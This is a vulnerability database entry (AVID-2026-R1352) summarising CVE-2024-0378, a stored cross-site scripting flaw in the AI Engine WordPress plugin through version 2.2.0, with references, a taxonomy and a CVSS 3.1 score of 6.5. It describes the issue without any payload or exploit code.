We use cookies to improve your experience on our site.
AVID-2026-R1352
Description
Vulnerability CVE-2024-0378
Details
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Reason for inclusion in AVID: CVE-2024-0378 describes a stored cross-site scripting vulnerability in the AI Engine WordPress plugin, which provides AI chat features. This plugin is a software component commonly used in AI-enabled web deployments and pipelines, making it a part of the software supply chain for general-purpose AI systems (AI features in websites, integrations, and tooling). The issue is a security vulnerability (XSS) with potential impact on integrity and confidentiality, and the report provides clear evidence (CVE ID, description, affected versions, and references).
References
- NVD entry
- https://www.wordfence.com/threat-intel/vulnerabilities/id/54344300-6288-40bc-b539-3dc9b555ed00?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=
Affected or Relevant Artifacts
- Developer: tigroumeow
- Deployer: tigroumeow
- Artifact Details:
| Type | Name |
|---|---|
| System | AI Engine |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CVSS
| Version | 3.1 |
| Vector String | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
| Base Score | 6.5 |
| Base Severity | 🟠 Medium |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2024-03-02
- Version: 0.3.3
- AVID Entry